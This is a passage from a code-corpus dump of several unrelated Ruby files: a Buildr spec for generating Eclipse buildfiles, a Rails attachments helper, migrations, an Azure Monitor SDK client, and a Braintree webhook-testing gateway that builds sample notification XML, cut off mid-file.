"#{quantity} x #{item} @ #{self.base}"
end
end
| 20.909091 | 56 | 0.730435 |
333fa3f01abb5f1ed0e8fc209106e324211257fc | 11,421 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with this
# work for additional information regarding copyright ownership. The ASF
# licenses this file to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
require File.expand_path(File.join(File.dirname(__FILE__), '..', 'spec_helpers'))
module EclipseHelper
def setupExample(group, projectName, options = {})
options[:symName] ? symName = options[:symName] :symName = File.basename(projectName)
requiredPlugins = nil
if options[:requires]
requiredPlugins = "Require-Bundle: #{options[:requires]};bundle-version=\"1.1.0\",\n"
end
write "#{group}/#{projectName}/META-INF/MANIFEST.MF", <<-MANIFEST
Manifest-Version: 1.0
Name: #{projectName}
Bundle-Version: 1.1
Specification-Title: "Examples for #{File.basename(projectName)}"
Specification-Version: "1.0"
Specification-Vendor: "Acme Corp.".
Implementation-Title: "#{File.basename(projectName)}"
Implementation-Version: "build57"
Implementation-Vendor: "Acme Corp."
Bundle-SymbolicName: #{symName}
#{requiredPlugins}
MANIFEST
write "#{group}/#{projectName}/.project", <<-DOT_PROJECT
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>#{File.basename(projectName)}</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.eclipse.jdt.core.javabuilder</name>
<arguments>
</arguments>
</buildCommand>
<buildCommand>
<name>org.eclipse.pde.ManifestBuilder</name>
<arguments>
</arguments>
</buildCommand>
<buildCommand>
<name>org.eclipse.pde.SchemaBuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.eclipse.pde.PluginNature</nature>
<nature>org.eclipse.jdt.core.javanature</nature>
</natures>
</projectDescription>
DOT_PROJECT
write "#{group}/#{projectName}/.classpath", <<-DOT_CLASSPATH
<?xml version="1.0" encoding="UTF-8"?>
<classpath>
<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.6"/>
<classpathentry kind="con" path="org.eclipse.pde.core.requiredPlugins"/>
<classpathentry kind="src" path="src"/>
<classpathentry combineaccessrules="false" kind="src" path="/another.plugin"/>
<classpathentry kind="output" path="bin"/>
</classpath>
DOT_CLASSPATH
write "#{group}/#{projectName}/plugin.xml", <<-PLUGIN_XML
<?xml version="1.0" encoding="UTF-8"?>
<?eclipse version="3.0"?>
<plugin>
<!--some comment
-->
</plugin>
PLUGIN_XML
write "#{group}/#{projectName}/build.properties", <<-BUILD_PROPERTIES
source.. = src/
output.. = bin/
javacDefaultEncoding.. = UTF-8
bin.includes = META-INF/,\
.,\
plugin.xml,\
rsc/,
BUILD_PROPERTIES
end
end
describe Buildr::Generate do
include EclipseHelper
describe 'it should find a single eclipse project' do
top = "top_#{__LINE__}"
before do
setupExample(top, 'single')
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
end
it 'should create a valid buildfile' do
define('first')
File.exists?(File.join(top, 'single', '.project')).should be_true
File.exists?(File.join(top, '.project')).should be_false
File.exists?('.project').should be_false
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain("GROUP = \"#{top}\"")
lambda { Buildr.application.run }.should_not raise_error
end
it "should not add project if the corresponding .project file is not an eclipse project" do
buildFile = File.join(top, 'buildfile')
FileUtils.rm(buildFile)
write File.join(top, 'myproject', '.project'), '# Dummy file'
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
file(buildFile).should exist
file(buildFile).should contain('define "single"')
file(buildFile).should_not contain('define "myproject"')
lambda { Buildr.application.run }.should_not raise_error
end
it 'should honour Bundle-Version in MANIFEST.MF' do
define('bundle_version')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define "single"')
file(buildFile).should contain('define "single", :version => "1.1"')
lambda { Buildr.application.run }.should_not raise_error
end
it "should pass source in build.properties to layout[:source, :main, :java] and layout[:source, :main, :scala]" do
define('layout_source')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define')
file(buildFile).should contain('define "single"')
file(buildFile).should contain('layout[:source, :main, :java]')
file(buildFile).should contain('layout[:source, :main, :scala]')
lambda { Buildr.application.run }.should_not raise_error
end
it "should pass output in build.properties to layout[:target, :main], etc" do
define('layout_target')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define')
file(buildFile).should contain('define "single"')
file(buildFile).should contain('layout[:target, :main]')
file(buildFile).should contain('layout[:target, :main, :java]')
file(buildFile).should contain('layout[:target, :main, :scala]')
lambda { Buildr.application.run }.should_not raise_error
end
it "should package an eclipse plugin" do
define('layout_target')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define')
file(buildFile).should contain('package(:jar)')
lambda { Buildr.application.run }.should_not raise_error
end
end
describe 'it should check for a SymbolicName in MANIFEST.MF' do
top = "top_#{__LINE__}"
before do
setupExample(top, 'single', { :symName => 'singleSymbolicName'} )
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
end
it "should set the project name to the SymbolicName from the MANIFEST.MF" do
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define "singleSymbolicName"')
lambda { Buildr.application.run }.should_not raise_error
end
end
describe 'it should accecpt singleton SymbolicName in MANIFEST.MF' do
top = "top_#{__LINE__}"
before do
setupExample(top, 'single', { :symName => 'singleSymbolicName;singleton:=true'})
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
end
it "should not get confused if SymbolicName in MANIFEST.MF is a singleton:=true" do
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define "singleSymbolicName"')
lambda { Buildr.application.run }.should_not raise_error
end
end
describe 'it should find an eclipse project deep' do
top = "top_#{__LINE__}"
before do
setupExample(top, 'nested/single')
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
end
it 'should create a valid buildfile for a nested project' do
setupExample(top, 'single')
define('nested/second')
File.exists?(File.join(top, 'single', '.project')).should be_true
File.exists?(File.join(top, '.project')).should be_false
File.exists?('.project').should be_false
buildFile = File.join(top, 'buildfile')
file(buildFile).should contain("GROUP = \"#{top}\"")
file(buildFile).should contain('define "single"')
lambda { Buildr.application.run }.should_not raise_error
end
it "should correct the path for a nested plugin" do
define('base_dir')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('define "single"')
file(buildFile).should contain('define "single", :version => "1.1", :base_dir => "nested/single"')
lambda { Buildr.application.run }.should_not raise_error
end
end
describe 'it should detect dependencies between projects' do
top = "top_#{__LINE__}"
before do
setupExample(top, 'first')
write(File.join(top, 'first', 'src','org','demo','Demo.java'))
write(File.join(top, 'first', 'rsc','aResource.txt'))
setupExample(top, 'second', { :requires => 'first'} )
write(File.join(top, 'second', 'src','org','second','Demo.java'))
setupExample(top, 'aFragment', { :fragment_host => 'second'})
write(File.join(top, 'aFragment', 'fragment.xml'))
File.open(File.join(top, 'buildfile'), 'w') { |file| file.write Generate.from_eclipse(File.join(Dir.pwd, top)).join("\n") }
end
it 'should add "compile.with dependencies" in MANIFEST.MF' do
define('base_dir')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain('compile.with dependencies')
file(buildFile).should contain('resources')
lambda { Buildr.application.run }.should_not raise_error
end
#dependencies << projects("first")
it 'should honour Require-Bundle in MANIFEST.MF' do
define('base_dir')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
file(buildFile).should contain(/define "second"/)
file(buildFile).should contain( /dependencies << projects\("first"\)/)
file(buildFile).should contain(/define "second".*do.*dependencies << projects\("first"\).* end/m)
lambda { Buildr.application.run }.should_not raise_error
end
# Fragments are only supported with buildr4osi which is not (yet?) part of buildr
it 'should skip fragments.' do
define('base_dir')
buildFile = File.join(top, 'buildfile')
file(buildFile).should exist
# system("cat #{buildFile}") # if $VERBOSE
file(buildFile).should contain('define "first"')
lambda { Buildr.application.run }.should_not raise_error
end
end
end
| 40.644128 | 152 | 0.655722 |
f8c8c3e4e8c55c33eea55bc05e683e335c396b1b | 1,438 | module AttachmentsHelper
def default_url_options
{ host: Plek.new.website_root, protocol: "https" }
end
def previewable?(attachment)
attachment.csv? && attachment.attachable.is_a?(Edition)
end
# Until we have sensible (resourceful) routing for serving attachments, this method
# provides a convenient shorthand for generating a path for attachment preview.
def preview_path_for_attachment(attachment)
csv_preview_path(id: attachment.attachment_data.id, file: attachment.filename_without_extension, extension: attachment.file_extension)
end
def participating_in_accessible_format_request_pilot?(contact_email)
# A small number of organisations are taking part in a pilot scheme for accessible
# format requests to be submitted by a form rather than a direct email
pilot_addresses = GovukPublishingComponents::Presenters::Attachment::EMAILS_IN_ACCESSIBLE_FORMAT_REQUEST_PILOT
pilot_addresses.include?(contact_email)
end
def block_attachments(attachments = [],
alternative_format_contact_email = nil,
published_on = nil)
attachments.collect do |attachment|
render(
partial: "documents/attachment",
formats: :html,
object: attachment,
locals: {
alternative_format_contact_email: alternative_format_contact_email,
published_on: published_on,
},
)
end
end
end
| 36.871795 | 138 | 0.729485 |
1a5ea6e7702ed89c3ee7b7aae9e4cadc19853411 | 219 | class CreateComments < ActiveRecord::Migration[6.0]
def change
create_table :comments do |t|
t.integer :user_id
t.integer :development_id
t.string :body
t.integer :rating
end
end
end
| 19.909091 | 51 | 0.6621 |
9155d4f3df1e835fcfbb9acf6318f3532ec81299 | 39 | module Cleaner
VERSION = "0.0.7"
end
| 9.75 | 19 | 0.666667 |
3916c67d62495ff57db045f936be8a61ff3193f7 | 248 | # frozen_string_literal: true
class CreateTeams < ActiveRecord::Migration[7.0]
def change
create_table :teams do |t|
t.string :name, null: false
t.text :permissions, null: false, default: ""
t.timestamps
end
end
end
| 19.076923 | 51 | 0.665323 |
ab72d865f324c312df71a75f964bcdbe0967b68b | 8,659 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Monitor::Mgmt::V2017_05_01_preview
#
# Monitor Management Client
#
class DiagnosticSettingsCategoryOperations
include MsRestAzure
#
# Creates and initializes a new instance of the DiagnosticSettingsCategoryOperations class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [MonitorManagementClient] reference to the MonitorManagementClient
attr_reader :client
#
# Gets the diagnostic settings category for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param name [String] The name of the diagnostic setting.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DiagnosticSettingsCategoryResource] operation results.
#
def get(resource_uri, name, custom_headers:nil)
response = get_async(resource_uri, name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the diagnostic settings category for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param name [String] The name of the diagnostic setting.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(resource_uri, name, custom_headers:nil)
get_async(resource_uri, name, custom_headers:custom_headers).value!
end
#
# Gets the diagnostic settings category for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param name [String] The name of the diagnostic setting.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(resource_uri, name, custom_headers:nil)
fail ArgumentError, 'resource_uri is nil' if resource_uri.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, 'name is nil' if name.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{resourceUri}/providers/microsoft.insights/diagnosticSettingsCategories/{name}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'name' => name},
skip_encoding_path_params: {'resourceUri' => resource_uri},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Monitor::Mgmt::V2017_05_01_preview::Models::DiagnosticSettingsCategoryResource.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists the diagnostic settings categories for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DiagnosticSettingsCategoryResourceCollection] operation results.
#
def list(resource_uri, custom_headers:nil)
response = list_async(resource_uri, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Lists the diagnostic settings categories for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(resource_uri, custom_headers:nil)
list_async(resource_uri, custom_headers:custom_headers).value!
end
#
# Lists the diagnostic settings categories for the specified resource.
#
# @param resource_uri [String] The identifier of the resource.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(resource_uri, custom_headers:nil)
fail ArgumentError, 'resource_uri is nil' if resource_uri.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{resourceUri}/providers/microsoft.insights/diagnosticSettingsCategories'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'resourceUri' => resource_uri},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Monitor::Mgmt::V2017_05_01_preview::Models::DiagnosticSettingsCategoryResourceCollection.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
end
end
| 41.430622 | 141 | 0.694653 |
03484ce767b72023c560ca1eee003c243c7387bb | 310 | json.id @review.id
json.body do
json.title @review.title
json.description @review.description
json.score @review.score
json.reviewer_id @review.reviewer_id
end
json.dates do
json.created_at @review.created_at
json.updated_at @review.updated_at
json.url review_url(@review, format: :json)
end
| 20.666667 | 45 | 0.767742 |
181fd4382ed987f7b1c033bd35a778cc50b1273a | 21,218 | module Braintree
class WebhookTestingGateway # :nodoc:
def initialize(gateway)
@gateway = gateway
@config = gateway.config
@config.assert_has_access_token_or_keys
end
def sample_notification(kind, id)
payload = Base64.encode64(_sample_xml(kind, id))
signature_string = "#{@config.public_key}|#{Braintree::Digest.hexdigest(@config.private_key, payload)}"
return {:bt_signature => signature_string, :bt_payload => payload}
end
def _sample_xml(kind, data)
<<-XML
<notification>
<timestamp type="datetime">#{Time.now.utc.iso8601}</timestamp>
<kind>#{kind}</kind>
<subject>
#{_subject_sample_xml(kind, data)}
</subject>
</notification>
XML
end
def _subject_sample_xml(kind, id)
case kind
when Braintree::WebhookNotification::Kind::Check
_check
when Braintree::WebhookNotification::Kind::DisputeOpened
_dispute_opened_sample_xml(id)
when Braintree::WebhookNotification::Kind::DisputeLost
_dispute_lost_sample_xml(id)
when Braintree::WebhookNotification::Kind::DisputeWon
_dispute_won_sample_xml(id)
when Braintree::WebhookNotification::Kind::PartnerMerchantConnected
_partner_merchant_connected_sample_xml(id)
when Braintree::WebhookNotification::Kind::PartnerMerchantDisconnected
_partner_merchant_disconnected_sample_xml(id)
when Braintree::WebhookNotification::Kind::PartnerMerchantDeclined
_partner_merchant_declined_sample_xml(id)
when Braintree::WebhookNotification::Kind::SubMerchantAccountApproved
_merchant_account_approved_sample_xml(id)
when Braintree::WebhookNotification::Kind::SubMerchantAccountDeclined
_merchant_account_declined_sample_xml(id)
when Braintree::WebhookNotification::Kind::TransactionDisbursed
_transaction_disbursed_sample_xml(id)
when Braintree::WebhookNotification::Kind::TransactionSettled
_transaction_settled_sample_xml(id)
when Braintree::WebhookNotification::Kind::TransactionSettlementDeclined
_transaction_settlement_declined_sample_xml(id)
when Braintree::WebhookNotification::Kind::DisbursementException
_disbursement_exception_sample_xml(id)
when Braintree::WebhookNotification::Kind::Disbursement
_disbursement_sample_xml(id)
when Braintree::WebhookNotification::Kind::SubscriptionChargedSuccessfully
_subscription_charged_successfully(id)
when Braintree::WebhookNotification::Kind::AccountUpdaterDailyReport
_account_updater_daily_report_sample_xml(id)
when Braintree::WebhookNotification::Kind::ConnectedMerchantStatusTransitioned
_auth_status_transitioned_sample_xml(id)
when Braintree::WebhookNotification::Kind::ConnectedMerchantPayPalStatusChanged
_auth_paypal_status_changed_sample_xml(id)
when Braintree::WebhookNotification::Kind::IdealPaymentComplete
_ideal_payment_complete_sample_xml(id)
when Braintree::WebhookNotification::Kind::IdealPaymentFailed
_ideal_payment_failed_sample_xml(id)
else
_subscription_sample_xml(id)
end
end
def _check
<<-XML
<check type="boolean">true</check>
XML
end
def _subscription_charged_successfully(id)
<<-XML
<subscription>
<id>#{id}</id>
<transactions type="array">
<transaction>
<status>submitted_for_settlement</status>
<amount>49.99</amount>
</transaction>
</transactions>
<add_ons type="array">
</add_ons>
<discounts type="array">
</discounts>
</subscription>
XML
end
def _subscription_sample_xml(id)
<<-XML
<subscription>
<id>#{id}</id>
<transactions type="array">
</transactions>
<add_ons type="array">
</add_ons>
<discounts type="array">
</discounts>
</subscription>
XML
end
def _partner_merchant_connected_sample_xml(data)
<<-XML
<partner-merchant>
<merchant-public-id>public_id</merchant-public-id>
<public-key>public_key</public-key>
<private-key>private_key</private-key>
<partner-merchant-id>abc123</partner-merchant-id>
<client-side-encryption-key>cse_key</client-side-encryption-key>
</partner-merchant>
XML
end
def _partner_merchant_disconnected_sample_xml(data)
<<-XML
<partner-merchant>
<partner-merchant-id>abc123</partner-merchant-id>
</partner-merchant>
XML
end
def _partner_merchant_declined_sample_xml(data)
<<-XML
<partner-merchant>
<partner-merchant-id>abc123</partner-merchant-id>
</partner-merchant>
XML
end
def _merchant_account_approved_sample_xml(id)
<<-XML
<merchant_account>
<id>#{id}</id>
<master_merchant_account>
<id>master_ma_for_#{id}</id>
<status>active</status>
</master_merchant_account>
<status>active</status>
</merchant_account>
XML
end
def _merchant_account_declined_sample_xml(id)
<<-XML
<api-error-response>
<message>Credit score is too low</message>
<errors>
<errors type="array"/>
<merchant-account>
<errors type="array">
<error>
<code>82621</code>
<message>Credit score is too low</message>
<attribute type="symbol">base</attribute>
</error>
</errors>
</merchant-account>
</errors>
<merchant-account>
<id>#{id}</id>
<status>suspended</status>
<master-merchant-account>
<id>master_ma_for_#{id}</id>
<status>suspended</status>
</master-merchant-account>
</merchant-account>
</api-error-response>
XML
end
def _transaction_disbursed_sample_xml(id)
<<-XML
<transaction>
<id>#{id}</id>
<amount>100</amount>
<disbursement-details>
<disbursement-date type="date">2013-07-09</disbursement-date>
</disbursement-details>
</transaction>
XML
end
def _transaction_settled_sample_xml(id)
<<-XML
<transaction>
<id>#{id}</id>
<status>settled</status>
<type>sale</type>
<currency-iso-code>USD</currency-iso-code>
<amount>100.00</amount>
<merchant-account-id>ogaotkivejpfayqfeaimuktty</merchant-account-id>
<payment-instrument-type>us_bank_account</payment-instrument-type>
<us-bank-account>
<routing-number>123456789</routing-number>
<last-4>1234</last-4>
<account-type>checking</account-type>
<account-holder-name>Dan Schulman</account-holder-name>
</us-bank-account>
</transaction>
XML
end
def _transaction_settlement_declined_sample_xml(id)
<<-XML
<transaction>
<id>#{id}</id>
<status>settlement_declined</status>
<type>sale</type>
<currency-iso-code>USD</currency-iso-code>
<amount>100.00</amount>
<merchant-account-id>ogaotkivejpfayqfeaimuktty</merchant-account-id>
<payment-instrument-type>us_bank_account</payment-instrument-type>
<us-bank-account>
<routing-number>123456789</routing-number>
<last-4>1234</last-4>
<account-type>checking</account-type>
<account-holder-name>Dan Schulman</account-holder-name>
</us-bank-account>
</transaction>
XML
end
def _dispute_opened_sample_xml(id)
if id == "legacy_dispute_id"
_old_dispute_opened_sample_xml(id)
else
_new_dispute_opened_sample_xml(id)
end
end
def _dispute_lost_sample_xml(id)
if id == "legacy_dispute_id"
_old_dispute_lost_sample_xml(id)
else
_new_dispute_lost_sample_xml(id)
end
end
def _dispute_won_sample_xml(id)
if id == "legacy_dispute_id"
_old_dispute_won_sample_xml(id)
else
_new_dispute_won_sample_xml(id)
end
end
def _old_dispute_opened_sample_xml(id)
<<-XML
<dispute>
<amount>100.00</amount>
<currency-iso-code>USD</currency-iso-code>
<received-date type="date">2014-03-01</received-date>
<reply-by-date type="date">2014-03-21</reply-by-date>
<kind>chargeback</kind>
<status>open</status>
<reason>fraud</reason>
<id>#{id}</id>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
</dispute>
XML
end
def _old_dispute_lost_sample_xml(id)
<<-XML
<dispute>
<amount>100.00</amount>
<currency-iso-code>USD</currency-iso-code>
<received-date type="date">2014-03-01</received-date>
<reply-by-date type="date">2014-03-21</reply-by-date>
<kind>chargeback</kind>
<status>lost</status>
<reason>fraud</reason>
<id>#{id}</id>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
</dispute>
XML
end
def _old_dispute_won_sample_xml(id)
<<-XML
<dispute>
<amount>100.00</amount>
<currency-iso-code>USD</currency-iso-code>
<received-date type="date">2014-03-01</received-date>
<reply-by-date type="date">2014-03-21</reply-by-date>
<kind>chargeback</kind>
<status>won</status>
<reason>fraud</reason>
<id>#{id}</id>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
<date-won type=\"date\">2014-03-22</date-won>
</dispute>
XML
end
def _new_dispute_opened_sample_xml(id)
<<-XML
<dispute>
<id>#{id}</id>
<amount>100.00</amount>
<amount-disputed>100.00</amount-disputed>
<amount-won>95.00</amount-won>
<case-number>CASE-12345</case-number>
<created-at type="datetime">2017-06-16T20:44:41Z</created-at>
<currency-iso-code>USD</currency-iso-code>
<forwarded-comments nil="true"/>
<kind>chargeback</kind>
<merchant-account-id>ytnlulaloidoqwvzxjrdqputg</merchant-account-id>
<reason>fraud</reason>
<reason-code nil="true"/>
<reason-description nil="true"/>
<received-date type="date">2016-02-15</received-date>
<reference-number>REF-9876</reference-number>
<reply-by-date type="date">2016-02-22</reply-by-date>
<status>open</status>
<updated-at type="datetime">2017-06-16T20:44:41Z</updated-at>
<original-dispute-id>9qde5qgp</original-dispute-id>
<status-history type="array">
<status-history>
<status>open</status>
<timestamp type="datetime">2017-06-16T20:44:41Z</timestamp>
</status-history>
</status-history>
<evidence type="array"/>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
<created-at>2017-06-21T20:44:41Z</created-at>
<order-id nil="true"/>
<purchase-order-number nil="true"/>
<payment-instrument-subtype>Visa</payment-instrument-subtype>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
</dispute>
XML
end
def _new_dispute_lost_sample_xml(id)
<<-XML
<dispute>
<id>#{id}</id>
<amount>100.00</amount>
<amount-disputed>100.00</amount-disputed>
<amount-won>95.00</amount-won>
<case-number>CASE-12345</case-number>
<created-at type="datetime">2017-06-16T20:44:41Z</created-at>
<currency-iso-code>USD</currency-iso-code>
<forwarded-comments nil="true"/>
<kind>chargeback</kind>
<merchant-account-id>ytnlulaloidoqwvzxjrdqputg</merchant-account-id>
<reason>fraud</reason>
<reason-code nil="true"/>
<reason-description nil="true"/>
<received-date type="date">2016-02-15</received-date>
<reference-number>REF-9876</reference-number>
<reply-by-date type="date">2016-02-22</reply-by-date>
<status>lost</status>
<updated-at type="datetime">2017-06-21T20:44:41Z</updated-at>
<original-dispute-id>9qde5qgp</original-dispute-id>
<status-history type="array">
<status-history>
<status>open</status>
<timestamp type="datetime">2017-06-16T20:44:41Z</timestamp>
</status-history>
<status-history>
<status>lost</status>
<timestamp type="datetime">2017-06-25T20:50:55Z</timestamp>
</status-history>
</status-history>
<evidence type="array">
<evidence>
<id>rxtngk9j5j93tsrq</id>
<comments nil="true"/>
<created-at type="datetime">2017-06-21T20:44:42Z</created-at>
<sent-to-processor-at nil="true"/>
<url>s3.amazonaws.com/foo.jpg</url>
</evidence>
<evidence>
<id>88cfb8dd</id>
<comments>text evidence</comments>
<created-at type="datetime">2017-06-21T20:44:42Z</created-at>
<sent-to-processor-at nil="true"/>
<url nil="true"/>
</evidence>
</evidence>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
<created-at>2017-06-21T20:44:41Z</created-at>
<order-id nil="true"/>
<purchase-order-number nil="true"/>
<payment-instrument-subtype>Visa</payment-instrument-subtype>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
</dispute>
XML
end
def _new_dispute_won_sample_xml(id)
<<-XML
<dispute>
<id>#{id}</id>
<amount>100.00</amount>
<amount-disputed>100.00</amount-disputed>
<amount-won>95.00</amount-won>
<case-number>CASE-12345</case-number>
<created-at type="datetime">2017-06-16T20:44:41Z</created-at>
<currency-iso-code>USD</currency-iso-code>
<forwarded-comments nil="true"/>
<kind>chargeback</kind>
<merchant-account-id>ytnlulaloidoqwvzxjrdqputg</merchant-account-id>
<reason>fraud</reason>
<reason-code nil="true"/>
<reason-description nil="true"/>
<received-date type="date">2016-02-15</received-date>
<reference-number>REF-9876</reference-number>
<reply-by-date type="date">2016-02-22</reply-by-date>
<status>won</status>
<updated-at type="datetime">2017-06-21T20:44:41Z</updated-at>
<original-dispute-id>9qde5qgp</original-dispute-id>
<status-history type="array">
<status-history>
<status>open</status>
<timestamp type="datetime">2017-06-16T20:44:41Z</timestamp>
</status-history>
<status-history>
<status>won</status>
<timestamp type="datetime">2017-06-25T20:50:55Z</timestamp>
</status-history>
</status-history>
<evidence type="array">
<evidence>
<id>rxtngk9j5j93tsrq</id>
<comments nil="true"/>
<created-at type="datetime">2017-06-21T20:44:42Z</created-at>
<sent-to-processor-at nil="true"/>
<url>s3.amazonaws.com/foo.jpg</url>
</evidence>
<evidence>
<id>88cfb8dd</id>
<comments>text evidence</comments>
<created-at type="datetime">2017-06-21T20:44:42Z</created-at>
<sent-to-processor-at nil="true"/>
<url nil="true"/>
</evidence>
</evidence>
<transaction>
<id>#{id}</id>
<amount>100.00</amount>
<created-at>2017-06-21T20:44:41Z</created-at>
<order-id nil="true"/>
<purchase-order-number nil="true"/>
<payment-instrument-subtype>Visa</payment-instrument-subtype>
</transaction>
<date-opened type=\"date\">2014-03-21</date-opened>
<date-won type=\"date\">2014-03-22</date-won>
</dispute>
XML
end
def _disbursement_exception_sample_xml(id)
<<-XML
<disbursement>
<id>#{id}</id>
<transaction-ids type="array">
<item>afv56j</item>
<item>kj8hjk</item>
</transaction-ids>
<success type="boolean">false</success>
<retry type="boolean">false</retry>
<merchant-account>
<id>merchant_account_token</id>
<currency-iso-code>USD</currency-iso-code>
<sub-merchant-account type="boolean">false</sub-merchant-account>
<status>active</status>
</merchant-account>
<amount>100.00</amount>
<disbursement-date type="date">2014-02-10</disbursement-date>
<exception-message>bank_rejected</exception-message>
<follow-up-action>update_funding_information</follow-up-action>
</disbursement>
XML
end
def _disbursement_sample_xml(id)
<<-XML
<disbursement>
